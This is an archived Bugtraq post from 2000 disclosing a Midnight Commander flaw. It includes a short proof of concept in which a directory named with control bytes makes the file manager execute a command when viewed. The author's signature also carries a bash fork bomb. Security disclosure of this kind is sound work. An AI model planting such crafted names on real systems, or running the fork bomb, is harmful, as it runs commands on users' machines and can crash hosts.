[17813] in bugtraq
Midnight Commander
daemon@ATHENA.MIT.EDU (Michal Zalewski)
Tue Nov 28 15:03:25 2000
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.LNX.4.10.10011280100360.925-100000@localhost>
Date: Tue, 28 Nov 2000 01:15:51 +0100
Reply-To: Michal Zalewski <lcamtuf@TPI.PL>
From: Michal Zalewski <lcamtuf@TPI.PL>
To: BUGTRAQ@SECURITYFOCUS.COM
The Midnight Commander 4.5.51 (latest).
$ od -t x1 mcbug
0000000 03 14 77 04 0a
$ mkdir `cat mcbug`
$ mc
(try to view this directory - 'w' - 0x77 command will be executed; longer
commands might be used, as well)
Obviously, this attack requires privledged user interaction. Midnight
Commander won't display full name of the directory if it's long enough, so
these control characters can be easily hidden.
Such problems in Midnight Commander seems to appear less or more
frequently. I am affraid this pretty useful file manager should not be
used in multiuser systems, especially by root (I can recall numerous
problems with this utility last years - code execution when viewing
specific file types, code execution via mc vfs support, etc etc) :(
Workaround: well, I am affraid only code audit might help :(
--
_______________________________________________________
Michal Zalewski [lcamtuf@tpi.pl] [tp.internet/security]
[http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};:
=--=> Did you know that clones never use mirrors? <=--=
